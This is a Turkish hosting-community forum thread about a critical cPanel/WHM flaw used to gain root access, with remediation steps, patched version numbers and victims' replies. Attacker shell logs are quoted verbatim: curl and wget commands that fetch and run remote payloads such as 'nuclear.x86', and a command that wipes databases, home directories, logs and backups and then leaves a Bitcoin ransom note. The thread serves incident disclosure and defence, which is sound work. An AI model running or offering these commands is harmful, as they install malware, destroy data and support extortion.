cPanel - Kritik Güvenlik Zafiyeti

Çok kritik bir güvenlik açığı. Geceden bu yana çoğu yer hacklenmiş.

Güvenlik açığı ile ilgili edindiğimiz bilgiler;

Saldırgan bir şekilde uzaktan root şifresi gerekmeden token oluşturuyor ve whm'ye root yetki ile erişim sağlıyor. Ardından aşağıdaki komutları çalıştırıyor /home ve /var/lib/mysql klasörünün içini boşaltıyor btc fidyesi istediğine dair bir index.html'yi tüm sitelere koyup çıkıyor.

Exploit'in tam olarak çalışmadığı durumlarda dosyalar ve veritabanları silinmiyor fakat açık devam ettiği sürece silinmeyeceğinin garantisi yok.

Bazı sunucularda root şifresinin değiştirildiğini gördük.

 266  2026-04-30 05:37:23 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516643467342442__
  267  2026-04-30 05:37:28 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516648634602778__
  268  2026-04-30 05:38:32 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516712767532216__
  269  2026-04-30 05:38:34 p6KjZRS0qb566ZT8
  270  2026-04-30 05:38:35  echo 59r8S55t; uname ; echo uKMzDxwm
  271  2026-04-30 05:38:35  export HISTORY=
  272  2026-04-30 05:38:37 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516717662270481__
  273  2026-04-30 05:38:39 9XHVUGYBe8d69cav
  274  2026-04-30 05:38:39  echo aSWrB2Db; uname ; echo gBAKTZPJ
  275  2026-04-30 05:38:40  export HISTORY=
  276  2026-04-30 05:38:46 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516726934665439__
  277  2026-04-30 05:57:51 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517871475262140__
  278  2026-04-30 05:57:57 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517877538308830__
  279  2026-04-30 05:58:08 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517888303469299__
  280  2026-04-30 05:58:29 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517909111748499__
  281  2026-04-30 05:58:32 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517912307294097__
  282  2026-04-30 07:22:55 awk -F'==' '{print $1}' /etc/userdatadomains
  283  2026-04-30 07:22:55 ( rm -rf /var/lib/mysql/* &> /dev/null; rm -rf /var/cpanel/sessions/* &> /dev/                         null;  rm -rf /home/*/ &> /dev/null; awk -F'==' '{print $5}' /etc/userdatadomains | while read dir; do mk                         dir -p $dir && echo "to recover your files, kindly send 0.1 BTC to bc1q9nh4revv6yqhj2gc5usncrpsfnh7ypwr9h                         0sp2 and tweet ty15b6TOTuBuzUhfypJeagHl4e2sAs26, then we will help u <3 " > $dir/index.html; done &> /dev                         /null; history -c; rm -rf /var/log/* &> /dev/null; rm -rf /home/*/.cpanel/backup/* &> /dev/null; whmapi1                          configureservice service=cpsrvd enabled=0 monitored=0 && whmapi1 configureservice service=cpdavd enabled=                         0 monitored=0 && /scripts/restartsrv_cpsrvd --stop && /scripts/restartsrv_cpdavd --stop ) &
  284  2026-04-30 07:22:55 exit

******************

UYGULANACAK ADIMLAR !!!

Root şifrenizle sunucunuza giriş yapamıyorsanız açıktan yüzde 99 etkilenmişsinizdir demektir. Kvm/konsol üzerinden root şifrenizi sıfırlayınız.

Ana dizinde nuclear ile başlayan dosyalar varsa hepsini silin.

Cpanel update işlemini ssh üzerinden acil olarak yapın, güncelleme yaptıktan sonra cpanel sürümünüzü kontrol edin.

Güncelleme komutu;

/scripts/upcp --force


Açığın fixlendiği sürümler;

11.86.0.41
11.110.0.97
11.118.0.63
11.126.0.54
11.130.0.19
11.132.0.29
11.136.0.5
11.134.0.20

Sunucunuz bu cpanel sürümlerinden birinde olmalıdır bu versiyonların altındaki tüm sürümler açık barındırıyor. Örneğin 11.134.0.20 açığın kapatıldığı stabil güncel sürümdür, 11.134.0.19 sürümü dahil geriye dönük sürümler risk barındırır.

Güncelleme tamamlandıktan sonra ssh üzerinden sürüm kontrolü için komut;

cat /usr/local/cpanel/version

Güncelleme sonrası sürüm açığın giderildiği sürümde ise;

/usr/local/cpanel/bin/servers_queue run

komutuyla güncelleme sonrası bekleyen arka plan işlemlerinin tamamlanmasını sağlıyoruz.

*** rm komutlarını dikkatli kullanın fazladan boşluk satır atlaması yapmayın ***

rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/preauth/*

komutlarıyla daha önceden açılmış zararlı zararsız tüm sessionları siliyoruz.

/scripts/restartsrv_cpsrvd --hard

komutuyla cpanel servisini yeniden başlatıyoruz.

***

/ root / .ssh / klasörü içinden güncel bir ssh key var mı kontrol ediniz ssh key kullanmıyorsanız "/ etc / ssh / sshd_config" içinden "PubkeyAuthentication" ayarını no yapıp ssh servisini service sshd restart komutuyla yeniden başlatın.

Cron dosyaları / var / spool /cron/ root ve / etc /cron.d dosyalarını inceleyiniz güncel bir değişiklik anormallik var mı kontrol ediniz.

Yeni açılmış bir hosting hesabı var mı kontrol ediniz, bazı sunucularda support isimli bir hosting hesabı açıldığı görülmüştür, yabancı hesaplar veya reseller hesabı varsa terminate ediniz. Whm api tokenleri kontrol edin yeni eklenmiş api tokenler varsa revoke ediniz.

Her ihtimale karşı root şifrenizi değiştiriniz ve sunucuyu reboot komutuyla yeniden başlatınız. Sunucu açıldıktan sonra eğer site dosyalarınız duruyor ve şifrelenmemiş ise güncel yedek alınız. Otomatik yedekleme ayarlanmış ise olaydan önce alınmış tüm yedekleri değişiklik tarihlerine dikkat ederek indiriniz.

***

Whm'de saldırgan tarafından injeksiyon edilmiş bir token/session kalmış mı kontrol etmek için https://support.cpanel.net/hc/en-us/...ate-04-28-2026 linkinde en altta yer alan detection script dosyasını çalıştırıp kontrol sağlayabilirsiniz.

Sonuç aşağıdaki gibi "[+] No indicators of compromise found." şeklinde ise önceki saldırılardan kalan ve tehlike oluşturabilecek bir token kalmamış demektir. Tüm bu işlemlere rağmen sunucudan dışarıya saldırı, port scan gibi aktiviteler devam ediyorsa, cpanel sistem dosyaları şifrelenmiş ve cpanel çalışamaz duruma geldi ise arka kapı kalmış olması riski yüksek ise aynı sunucuyu kullanmaya devam etmeyiniz temiz kurulum yapınız.

[*] Scanning session files for injection indicators...

=================================================================
                       SCAN SUMMARY
=================================================================
  CRITICAL findings: 0
  WARNING  findings: 0
  ATTEMPT  findings: 0
  INFO     findings: 0
  Total            : 0
-----------------------------------------------------------------
[+] No indicators of compromise found.

benim sistemede gelmişer btc istiyor kritik güncelleme arkadaşlar.

Merhaba az bütün web sitelerimiz patladı, tamamın erişimi kaybettik dosyalar şifrelenmiş. Geçmiş olsun

Merhaba,
cPanel'in suyu çok ısındı. Bu sadece Türkiye tarafında değil, dünya genelinde de böyle. Hem gereksiz pahalı, hem de son zamanlarda çok fazla sorun olmaya başladı. Hem firmalar hem müşteriler olarak DirectAdmin alternatifini düşünmeliyiz.

Çok ciddi bir durum 7 tane sunucum etkilendi.
Hetznerden abuse aldım bugün sunucularımdan dışarı iplerine tarama yapılıyor diye, kontrol ettiğimde bu olayın gerçekleştiğini gördüm.

Yaklaşık 20 gündür insanlara anlatmaya çalışıyorum ama uydurduğumu düşünüyorlardı. Sorun daha büyük, bu alınan önlemler çözüm değil, daha önce denedim ve yinede işlem yapılabiliyor. Exploit geliştirilebiliyor ve daha farklı işlemler de yapılıyor.
Hatta şunu söyleyebilirim. cPanel kullanan sadece 1 adet A kaydı olan cloudflare'de ki sitenin ip ve hostnamesini bile bastırıyor ekrana.

Benimde tüm sitelerim gitti. ilginç olan aşağıdaki şekilde Serverimden güncelleme notu geldi. burdaki linkten tıkladıktan sonra resetlendi, ilk önce mariadb gitti, sonra tüm siteler.


New Security Advisor notifications with High importance
TypeModuleAdvice HighProcessesThe system’s core libraries or services have been updated. "Reboot the server" to ensure the system benefits from these updates.In order to resolve these security concerns, log in to WHM and navigate to the “Security Advisor” interface.

Linki kontrol ettim sistem linki; .......com:2087/scripts/dialog?dialog=reboot

Evet sunucuda neler yaptıklarınıda ben paylaşayım (Aman linke tıklamayın)



wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777533466696419935
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777533466861036677
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777533478124263218
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777533486865001757
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777534528946491921
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777534528976194999
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777534538376379697
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777534547919935457
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777534633722996156
wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo CMD_DONE_1777534634110023932